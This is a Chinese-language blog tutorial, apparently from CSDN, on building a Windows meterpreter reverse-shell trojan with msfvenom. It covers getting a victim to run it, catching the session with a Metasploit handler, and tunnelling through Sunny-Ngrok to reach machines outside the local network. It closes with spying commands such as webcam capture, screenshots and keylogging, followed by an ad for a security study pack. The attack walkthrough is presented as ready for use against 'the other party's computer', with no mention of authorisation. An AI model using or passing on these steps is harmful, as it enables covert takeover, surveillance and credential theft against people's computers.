kali渗透内网和外网

生成木马文件,从而控制对方电脑(这里只能在同一个局域网下才能入侵)

第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:

-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”

lhost:设置kali的IP

lport:设置端口(要与下面的setlport保持一致)

-f:文件的类型为exe类型

-o:生成payload,名为payload.exe,保存在kali的/root目录下

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.77 lport=5000 -f
exe -o /root/tjy.exe

第二步:将生成的木马文件发送到对方电脑

我们启动kali

msfconsole 进入msfconsole

use exploit/multi/handler 使用这个漏洞辅助

![](https://img-
blog.csdnimg.cn/img_convert/f245f1324c62a6c103cc5fdfeb9bf204.png)

设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)

set payload windows/meterpreter/reverse_tcp

设置一个lhost和lport,要与文章最开始的msfvenom命令中的IP和端口保持一致

![](https://img-
blog.csdnimg.cn/img_convert/3b69cff4010946e46a1f0b2f19b7be40.png)

exploit 或 run

![](https://img-
blog.csdnimg.cn/img_convert/85f55de54914db0260d544566efe7eb7.png)

接下来我们只要等对方电脑运行刚刚那个木马

生成木马文件,从而控制对方电脑(内网可以入侵外网)

在开始生成木马之前,我们要先做好准备工作

在kali里面要下载Sunny-Ngrok的Linux64版本,下载好后解压

接着我们要在Sunny-
Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用

![](https://img-
blog.csdnimg.cn/img_convert/e7b64f097dc5c3e9fa51d981f3637c8a.png)

这里将下载好的linux64压缩包进行解压

命令解压缩:unzip linux_amd64(压缩包名)

![](https://img-
blog.csdnimg.cn/img_convert/1c487a7e02d32bbba681ef222195433d.png)

进入解压好的目录

cd linux_amd64

启动隧道映射TCP服务

./sunny clientid (隧道id) 这里的隧道id看下图

![](https://img-
blog.csdnimg.cn/img_convert/bdec5dfebdacb6b84345b12a5e87104f.png)

启动后是这样的

![](https://img-
blog.csdnimg.cn/img_convert/92b3e3220989c50b5feb29117db75265.png)

接下来就是生成外网的木马程序了

注意:这里lhost和lport分别为赠送的域名和端口

msfvenom -p
windows/meterpreter/reverse_tcplhost=xxx.xxx.com lport=10306 -f exe -o /root/shell.exe

![](https://img-
blog.csdnimg.cn/img_convert/25c1602a855adf059cfa0c18e712b756.png)

接下来就是在msf中设置payload,加载攻击模块设置本地IP何监听端口了

msfconsole 打开msf

use exploit/multi/handler 使用这个漏洞辅助

set payload windows/meterpreter/reverse_tcp
设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)

set LHOST 192.168.245.140 这里设置成kali的IP

set LPORT 4444 这里是你要侦听的端口

这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的,因为我们这是内网入侵外网

show options 查看IP端口设置情况

exploit 或 run 开启侦听

接下来我们只要等对方电脑运行刚刚那个木马

成功后时以下这图

![](https://img-
blog.csdnimg.cn/img_convert/ff24164bf8f4ec8fe28650d342b1daeb.png)

入侵成功后所能做的(这只是可以做的一部分)

getuid 获取靶机uidmeterpreter

shell 进入靶机shellmeterpreter

screenshot 靶机截屏meterpreter

webcam_snap 用靶机摄像头拍照meterpreter

webcam_stream 用靶机摄像头录像meterpreter

keyscan_start 开启键盘记录meterpreter

keyscan_dump 捕获键盘记录

keyscan_stop 停止键盘记录

学习计划安排


我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!

如果你对网络安全入门感兴趣,那么你需要的话可以

点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

  • 47
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值